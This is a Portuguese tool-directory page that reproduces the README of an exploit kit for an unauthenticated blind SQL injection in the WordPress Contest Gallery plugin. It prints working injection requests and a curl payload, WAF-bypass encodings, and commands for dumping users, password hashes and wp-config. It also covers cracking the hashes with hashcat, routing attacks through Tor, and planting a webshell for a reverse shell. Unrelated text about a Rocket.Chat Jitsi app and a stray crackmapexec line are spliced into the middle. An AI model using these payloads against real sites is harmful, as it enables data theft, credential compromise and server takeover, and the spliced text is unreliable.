Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WP-Contest-Gallery-28.1.4-Exploit — Kit de exploração completo para CVE-2026-3180 - vulnerabilidade de injeção SQL no WordPress Contest Gallery. Inclui extração automatizada de dados, bypass de WAF, reverse shell, integração com SQLMap, geração de extensão Burp e relatórios para testes de penetração e pesquisa de segurança. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/wp-contest-gallery-28.1.4-exploit
Quebra de SenhasScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoDesenvolvimento de Payloads
GitHubcerberusmrxi/wp-contest-gallery-28.1.4-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Kit de exploração completo para CVE-2026-3180 - vulnerabilidade de injeção SQL no WordPress Contest Gallery. Inclui extração automatizada de dados, bypass de WAF, reverse shell, integração com SQLMap, geração de extensão Burp e relatórios para testes de penetração e pesquisa de segurança.

WP-Contest-Gallery-28.1.4-Exploit

Ver Repositório
11há 1 mêsAinda não revisado
Compartilhar
⚠️ Em Teste
Este PoC está sendo ativamente testado e refinado. Recursos podem mudar entre versões.

CVE-2026-3180

WordPress Contest Gallery — Injeção SQL Cega Não Autenticada

Python Versão CVSS Licença Plataforma

Ferramenta de avaliação de prova de conceito para CVE-2026-3180
Autor: Sudeepa Wanigarathna · Descoberta original: cardosource


[!IMPORTANT] Uso autorizado apenas. Esta ferramenta destina-se a pesquisa em segurança, educação e teste de sistemas que você possui ou para os quais possui permissão explícita por escrito. O acesso não autorizado a sistemas de computador é ilegal. O autor não se responsabiliza pelo uso indevido.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Funcionalidades
  • Instalação
  • Início Rápido
  • Guia de Uso
  • Referência de Comandos
  • Técnicas de Injeção
  • Bypass de WAF
  • Extração de Dados
  • Integrações
  • Cadeia de Ataque
  • Saída e Relatórios
  • Docker
  • Integração CI/CD
  • Solução de Problemas
  • Estrutura do Repositório
  • Histórico de Versões
  • Aviso Legal
  • Autor e Créditos

Visão Geral

CVE-2026-3180 é uma injeção SQL cega não autenticada de alta severidade no plugin Contest Gallery do WordPress. A falha existe no manipulador AJAX post_cg1l_resend_unconfirmed_mail_frontend, onde o parâmetro cgl_mail é passado para uma consulta SQL sem a devida sanitização.

Este repositório fornece um PoC Python completo (v2.0) para profissionais de segurança autorizados validarem o impacto, extraírem dados do WordPress, gerarem relatórios e integrarem com ferramentas padrão da indústria (SQLMap, Burp Suite, Nuclei).

wp

Detalhes da Vulnerabilidade

Endpoint Afetado

CampoValor

Solicitação de Prova de Conceito```http

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded

action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20

root@kitploit:~
### Referências

- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [Artigo original (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)

---

## Funcionalidades

### Exploração Principal

| Capacidade | Descrição |
|---|---|
| Detecção de vulnerabilidades | Testes de consultas booleanas, baseadas em tempo, baseadas em erro, union e empilhadas |
| Extração cega | Extração de caracteres por busca binária via inferência booleana |
| Despejo completo de dados | Usuários, metadados do banco, opções, plugins, temas, posts, tabelas |
| Shell SQL interativa | Executar consultas `SELECT` arbitrárias no backend |
| Extração de wp-config.php | Tentativas de `LOAD_FILE()` em caminhos comuns |
| Shell reversa | Gravação de webshell PHP via `INTO OUTFILE` / `DUMPFILE` (quando permitido) |

### Evasão e Desempenho

| Capacidade | Descrição |
|---|---|
| Bypass de WAF | Mais de 15 técnicas de codificação e ofuscação |
| Multithreading | Threads de trabalho configuráveis para extração mais rápida |
| Limitação de taxa | Atraso configurável entre requisições |
| Lógica de repetição | Repetições automáticas em falhas transitórias |
| Rotação de User-Agent | Impressões digitais aleatórias de navegador por requisição |
| Suporte a proxy | Proxies HTTP/SOCKS e Tor (`socks5h://127.0.0.1:9050`) |

### Relatórios e Integrações

| Capacidade | Descrição |
|---|---|
| Geração de relatórios | Relatórios JSON e HTML com resumos de extração |
| Integração com SQLMap | Comando SQLMap gerado automaticamente com tampers |
| Extensão do Burp Suite | Gerador + script independente `burp_contest_gallery.py` |
| Template Nuclei | Template YAML para detecção em massa |
| Módulo Metasploit | Módulo auxiliar Ruby (`contest_gallery_sqli.rb`) |
| Automação de shell | Scripts Bash para fluxos baseados em curl e SQLMap |

### Operacional

| Capacidade | Descrição |
|---|---|
| Saída CLI colorida | Registro estruturado com níveis de severidade |
| Acompanhamento de progresso | Métricas em tempo real (requisições, temporização, velocidade de extração) |
| Modos silencioso / verboso | Adequado para scripts e depuração |
| Tratamento de sinais | Limpeza graciosa ao pressionar `Ctrl+C` |
| Pronto para Docker | Suporte a implantação containerizada |
| Pronto para pipeline CI/CD | Códigos de saída e saída JSON para automação |

---

## Instalação

### Pré-requisitos

- Python **3.8+**
- `pip`
- Conectividade de rede com o(s) alvo(s) em teste

### Ferramentas Externas Opcionais

| Ferramenta | Propósito |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | Injeção SQL automatizada |
| [Burp Suite](https://portswigger.net/burp) | Testes manuais e hospedagem de extensões |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | Varredura baseada em templates |
| [Hashcat](https://hashcat.net/hashcat/) | Quebra de hashes offline |
| [Tor](https://www.torproject.org/) | Roteamento anônimo (`--proxy tor`) |

### Configuração```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2026-3180.py --help

Dependências

Requerido (runtime):```text requests>=2.31.0

root@kitploit:~
**Recomendado (de requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0

O exploit principal utiliza apenas a biblioteca padrão do Python mais requests. Pacotes adicionais melhoram a saída e o relatório.


Início Rápido

Substitua http://target.example por um alvo apenas de laboratório ou autorizado.

Verificar vulnerabilidade```bash

python3 cve-2026-3180.py http://target.example --scan

root@kitploit:~
### Exploração completa (detectar + extrair)```bash
python3 cve-2026-3180.py http://target.example

Extrair usuários do WordPress```bash

python3 cve-2026-3180.py http://target.example --dump users

root@kitploit:~
### Shell SQL interativo```bash
python3 cve-2026-3180.py http://target.example --sql-shell

Gerar relatório HTML```bash

python3 cve-2026-3180.py http://target.example --report html -o assessment.html

root@kitploit:~
### Através do proxy Burp```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v

Guia de Uso

Apenas varredura de vulnerabilidades```bash

python3 cve-2026-3180.py http://target.example --scan

root@kitploit:~
Executa detecção booleana, baseada em tempo e baseada em erro sem extração completa.

### Extração completa de dados```bash
python3 cve-2026-3180.py http://target.example --dump all

Extrai informações do banco de dados, usuários, opções, plugins, temas, posts, tabelas e metadados do sistema.

Dumps seletivos```bash

python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes

root@kitploit:~
### Shell SQL interativo```bash
python3 cve-2026-3180.py http://target.example --sql-shell

Rocket.Chat.App-Jitsi

Adiciona suporte de videoconferência Jitsi ao Rocket.Chat.

Rocket.Chat.App-Jitsi

Rocket.Chat.App-Jitsi

Adiciona suporte de videoconferência Jitsi ao Rocket.Chat.

Suporte de videoconferência Rocket.Chat.App-Jitsi

Aplicativo de videoconferência usando Jitsi Meet como provedor de conferência.

Funcionalidades

  • Iniciar uma chamada de vídeo de dentro do Rocket.Chat (incluindo mensagens diretas, canais públicos/privados e discussões)
  • Links de participação anônima opcionais para cada servidor Jitsi configurado (URLs JWT não suportadas)
  • Especificar quais servidores Jitsi estão disponíveis (URLs JWT não suportadas)
  • Opção de especificar uma URL Jitsi personalizada (ex: meet.jit.si)
  • Opção de ativar/desativar a compatibilidade Jitsi (corrige alguns problemas ao usar versões mais antigas do Jitsi)
  • Opção de ativar/desativar o botão Jitsi para Canais
  • Opção de habilitar/desabilitar o botão Jitsi para conversas privadas```text sql> SELECT DATABASE() wordpress

sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]

sql> show tables ["wp_users", "wp_posts", "wp_options", ...]

sql> exit

root@kitploit:~
**Comandos do shell:**

| Comando | Descrição |
|---|---|
| `SELECT ...` | Executar uma consulta SQL e imprimir resultado |
| `show users` | Exibir usuários extraídos em cache |
| `show tables` | Exibir lista de tabelas em cache |
| `show database` | Exibir metadados do banco de dados em cache |
| `show config` | Exibir wp-config.php se extraído |
| `show options` | Exibir opções do WordPress |
| `show plugins` | Exibir plugins ativos |
| `help` | Listar comandos disponíveis |
| `exit` / `quit` | Sair do shell |

### Geração de relatório```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json

# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html

Shell reverso (apenas laboratório autorizado)```bash

Terminal 1 — listener

nc -lvnp 4444

Terminal 2 — exploit

python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444

root@kitploit:~
> Requer privilégio `FILE`, webroot gravável e `secure_file_priv` não bloqueando o caminho de destino.

### Geração de comando do SQLMap```bash
python3 cve-2026-3180.py http://target.example --sqlmap

Ou use o script de automação fornecido:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example

root@kitploit:~
### Extensão do Burp Suite```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension

# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py

Modelo do Nuclei```bash

python3 cve-2026-3180.py http://target.example --nuclei-template

Scan with generated template

nuclei -u http://target.example -t CVE-2026-3180.yaml

root@kitploit:~
### Automação em Bash (sem Python)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example

Roteamento Tor```bash

Ensure Tor is running on 127.0.0.1:9050

python3 cve-2026-3180.py http://target.example --proxy tor

root@kitploit:~
### Ajuste de desempenho```bash
python3 cve-2026-3180.py http://target.example \
  --threads 20 \
  --timeout 15 \
  --delay 0.1 \
  --retries 5 \
  -v

Referência de Comandos

Argumentos Posicionais

ArgumentoDescrição
targetURL base do WordPress alvo (ex.: http://target.example)

Opções de Rede

Opções de Saída

ArgumentoDescrição
--verbose, -vHabilitar registro de depuração
--quietSuprimir saída do console
--output,

Modos


Técnicas de Injeção

A ferramenta testa e utiliza automaticamente múltiplas estratégias de injeção:

Templates de Payload

O PayloadManager alterna entre mais de 12 templates de injeção:```text 'OR//{condition}#@teste.com 'OR{condition}-- - ')OR{condition}# '))OR{condition}# 'OR//{condition}OR//'1'='1'# 'UNION//SELECT{condition}# ...

root@kitploit:~
### Algoritmo de Extração Booleana

1. Confirmar a vulnerabilidade através dos comprimentos base verdadeiro/falso  
2. Pesquisa binária de `LENGTH()` do resultado da consulta alvo  
3. Pesquisa binária de `ASCII(SUBSTRING(...))` por posição de caractere  
4. Montar a string completa a partir dos caracteres extraídos  

---

## Bypass de WAF

Técnicas de ofuscação integradas aplicadas aleatoriamente ou sob demanda:

| Técnica | Descrição |
|---|---|
| `comment_obfuscation` | Substituir espaços por `/**/`, `/*!*/`, `-- `, `#` |
| `case_variation` | Caixa alta/baixa aleatória em caracteres alfabéticos |
| `url_encoding` | Codificação percentual padrão |
| `double_url_encoding` | Codificação percentual aninhada |
| `hex_encoding` | Codificação hexadecimal estilo `%41` |
| `unicode_encoding` | Codificação Unicode estilo `%u0041` |
| `white_space_variation` | Tabulações, novas linhas, alimentações de formulário em vez de espaços |
| `keyword_obfuscation` | Dividir palavras-chave: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | Concatenação de `CHAR()` via `\|\|` |
| `char_obfuscation` | Adição de `CHAR()` via `+` |

Exemplo de payload transformado:```text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com

Extração de Dados

Alvos de Extração

Forma do Objeto de Usuário Extraído```json

{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }

root@kitploit:~
### Quebra de Hashes de Senhas (offline)

Após a extração, quebre os hashes phpass do WordPress com o Hashcat:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json

# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

Integrações

SQLMap

Comando gerado (via --sqlmap):```bash sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs

root@kitploit:~
### Burp Suite

1. Carregue `burp_contest_gallery.py` em **Extender → Extensions → Add**  
2. Abra a aba **CVE-2026-3180**  
3. Insira o URL alvo e clique em **Exploit**  
4. O scanner passivo verifica requisições AJAX em busca de indicadores do Contest Gallery  

### Nuclei```yaml
id: CVE-2026-3180
info:
  name: WordPress Contest Gallery SQL Injection
  severity: high
  classification:
    cve-id: CVE-2026-3180
    cvss-score: 7.5

requests:
  - method: POST
    path: /wp-admin/admin-ajax.php
    body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"

Metasploit```bash

Copy module to Metasploit

cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/

Run

msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"

root@kitploit:~
---

## Cadeia de Ataque```mermaid
flowchart TD
    A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
    B --> C{"Injection type?"}
    C -->|Boolean| D["Response length inference"]
    C -->|Time| E["SLEEP delay inference"]
    C -->|Error| F["SQL error leakage"]
    D --> G["Binary-search extraction"]
    E --> G
    F --> G
    G --> H["WordPress data exfiltration"]
    H --> I["Users / hashes / options / config"]
    I --> J["Optional: OUTFILE webshell"]

Resumo Técnico

  1. Ponto de entrada — Ação AJAX post_cg1l_resend_unconfirmed_mail_frontend no plugin Contest Gallery.
  2. Sumidouro — Valor cgl_mail concatenado em SQL sem parametrização.
  3. Exploração — Inferência booleana cega extrai dados caractere por caractere.
  4. Impacto — Acesso total de leitura ao banco de dados WordPress; possível escrita de arquivo se os privilégios MySQL permitirem.

Saída e Relatórios

Saída do Console```text

[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!

root@kitploit:~
### Estrutura do Relatório JSON```json
{
  "metadata": {
    "cve": "CVE-2026-3180",
    "cvss_score": "7.5 (High)",
    "type": "boolean_based"
  },
  "target": {
    "url": "http://target.example",
    "ajax_url": "http://target.example/wp-admin/admin-ajax.php"
  },
  "vulnerability": {
    "vulnerable": true,
    "type": "boolean_based"
  },
  "extracted_data": {
    "database": { "name": "wordpress", "version": "8.0.35" },
    "users": [],
    "tables": [],
    "plugins": [],
    "options": {}
  },
  "summary": {
    "users_found": 3,
    "tables_found": 12,
    "plugins_found": 8,
    "config_extracted": false
  }
}

Os relatórios são salvos em reports/ por padrão.


Docker```dockerfile

FROM python:3.11-slim

WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt

ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]

root@kitploit:~
$ crackmapexec -t 10 <target>```bash
# Build
docker build -t cve-2026-3180 .

# Scan
docker run --rm cve-2026-3180 http://target.example --scan

# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
  http://target.example --report json

Integração CI/CD

Exemplo de fluxo de trabalho GitHub Actions para varreduras autorizadas em staging:```yaml name: CVE-2026-3180 Staging Scan

on: workflow_dispatch: schedule: - cron: '0 2 * * 1'

jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4

root@kitploit:~
  - uses: actions/setup-python@v5
    with:
      python-version: '3.11'

  - run: pip install -r requirements.txt

  - name: Vulnerability scan
    run: |
      python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
        --scan --quiet
    continue-on-error: true

  - name: Generate report
    run: |
      python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
        --report json -o reports/staging.json

  - uses: actions/upload-artifact@v4
    with:
      name: security-report
      path: reports/
root@kitploit:~
---

## Resolução de Problemas

| Sintoma | O que tentar |
|---|---|
| Destino não vulnerável | Confirmar que Contest Gallery ≤ 28.1.4 está instalado e ativo |
| Nenhuma diferença no tamanho da resposta | Tentar `--scan` para fallback baseado em tempo; aumentar `--timeout` |
| Extração muito lenta | Aumentar `--threads`; reduzir `--delay` com cautela |
| Erros de conexão | Aumentar `--timeout` e `--retries`; verificar configurações de proxy |
| WAF bloqueando requisições | Usar `--proxy tor`; a ferramenta aplica técnicas de bypass automaticamente |
| Falha no proxy Tor | Verificar Tor em `127.0.0.1:9050`; instalar `requests[socks]` se necessário |
| Dump de usuários vazio | O prefixo da tabela pode não ser `wp_`; usar `--sql-shell` com consultas personalizadas |
| wp-config não encontrado | Tentar `--sql-shell` com caminhos alternativos de `LOAD_FILE()` |
| Falha no reverse shell | Verificar privilégio `FILE`, `secure_file_priv`, permissões do webroot |

### Fluxo de Depuração```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v

# Through Burp
python3 cve-2026-3180.py http://target.example \
  --proxy http://127.0.0.1:8080 -v --scan

# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
  -d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
  -w "\nSize: %{size_download}\n"

Layout do Repositório```text

exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)

root@kitploit:~
---

## Histórico de Versões

### v2.0.0 — Edição Ultimate (Janeiro de 2026)

- Detecção de injeção booleana, baseada em tempo, erro, union e empilhada
- Pipeline completo de extração de dados do WordPress
- Mais de 15 técnicas de bypass de WAF
- Shell SQL interativa
- Geração de relatórios JSON / HTML
- Integrações com SQLMap, Burp e Nuclei
- Reverse shell via `INTO OUTFILE`
- Suporte a proxy e Tor
- Multi-threading com lógica de repetição
- Saída colorida e registro estruturado

### v1.0 — Lançamento Inicial

- Detecção básica baseada em booleano
- Extração manual de usuários

---

## Aviso Legal

Este projeto é fornecido **como está** para **pesquisa de segurança defensiva** e **testes de penetração autorizados**.

Ao usar este software, você concorda que:

1. Você terá como alvo apenas sistemas que possui ou para os quais está explicitamente autorizado a testar.
2. Você compreende as leis aplicáveis de abuso de computadores e proteção de dados.
3. O autor e colaboradores **não são responsáveis** por danos, perda de dados ou consequências legais decorrentes do uso indevido.

Se você descobrir esta vulnerabilidade em produção, siga as práticas de divulgação responsável e coordene com o fornecedor do plugin / equipe de segurança do WordPress quando apropriado.

---

## Autor & Créditos

| Papel | Nome |
|---|---|
| **Autor da Ferramenta** | Sudeepa Wanigarathna |
| **Descoberta Original** | cardosource |
| **CVE** | CVE-2026-3180 |
| **Licença** | MIT |

---

## Licença```
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

Suporte

  • Dê uma estrela no repositório se ele ajudar na sua pesquisa
  • Abra issues para bugs, falsos positivos ou melhorias de detecção
  • Pull requests são bem-vindos para documentação, técnicas de bypass de WAF e UX de laboratório autorizado

Apenas para testes de segurança autorizados.

Baixar ferramenta
AtributoValor
ID CVECVE-2026-3180
CVSS7.5 (Alta)
Vetor de AtaqueRede — não autenticado
ImpactoViolação de confidencialidade, leitura de banco de dados, roubo de credenciais
Produto AfetadoPlugin WordPress Contest Gallery
Versões Afetadas28.1.4 e anteriores
Tipo de VulnerabilidadeInjeção SQL Cega
DBMSMySQL / MariaDB
URL/wp-admin/admin-ajax.php
MétodoPOST
Açãopost_cg1l_resend_unconfirmed_mail_frontend
Parâmetro Vulnerávelcgl_mail
ArgumentoPadrãoDescrição
--proxy—URL do proxy ou tor para SOCKS5 via Tor
--timeout10Tempo limite de requisição HTTP (segundos)
--delay0.05Atraso entre requisições (segundos)
--retries3Número de tentativas em requisições falhas
--threads, -t5Tamanho do pool de threads
-o
Caminho personalizado do arquivo de saída
ArgumentoDescrição
(padrão)Exploração completa: detectar → escanear → extrair tudo
--scanApenas detecção de vulnerabilidades
--sql-shellShell SQL interativo
--dump {users,config,database,options,plugins,themes,all}Extrair dados específicos
--report {json,html}Gerar relatório de avaliação
--reverse-shell LHOST LPORTTentar reverse shell via escrita de arquivo
--sqlmapImprimir comando do SQLMap
--burp-extensionGerar extensão do Burp Suite
--nuclei-templateGerar template YAML do Nuclei
TipoMétodo de DetecçãoCaso de Uso
Baseado em booleanoDiferencial de tamanho de resposta (1=1 vs 1=2)Mecanismo primário de extração
Baseado em tempoInferência de atraso SLEEP()Fallback quando sinais booleanos são fracos
Baseado em erroEXTRACTVALUE() / strings de erro SQLMetadados rápidos quando erros vazam
Baseado em UNIONPayloads UNION SELECTRecuperação direta de valores (quando aplicável)
Consultas empilhadasSintaxe '; ... #Execução de múltiplas instruções (raro)
AlvoFonte SQLChave de Saída
Nome do banco de dadosSELECT DATABASE()database.name
Versão do BDSELECT VERSION()database.version
Usuário do BDSELECT USER()database.user
Tabelasinformation_schema.TABLEStables[]
Colunasinformation_schema.COLUMNScolumns{}
Usuários WPwp_usersusers[]
Hashes de senhaswp_users.user_passusers[].password_hash
E-mailswp_users.user_emailusers[].email
Papéiswp_usermeta capabilitiesusers[].roles
Opções do sitewp_optionsoptions{}
Plugins ativoswp_options.active_pluginsplugins[]
Temastemplate / stylesheet optionsthemes[]
Postagenswp_postsposts[]
wp-config.phpLOAD_FILE('/var/www/html/wp-config.php')config
Informações do sistema@@hostname, @@datadir, etc.system_info{}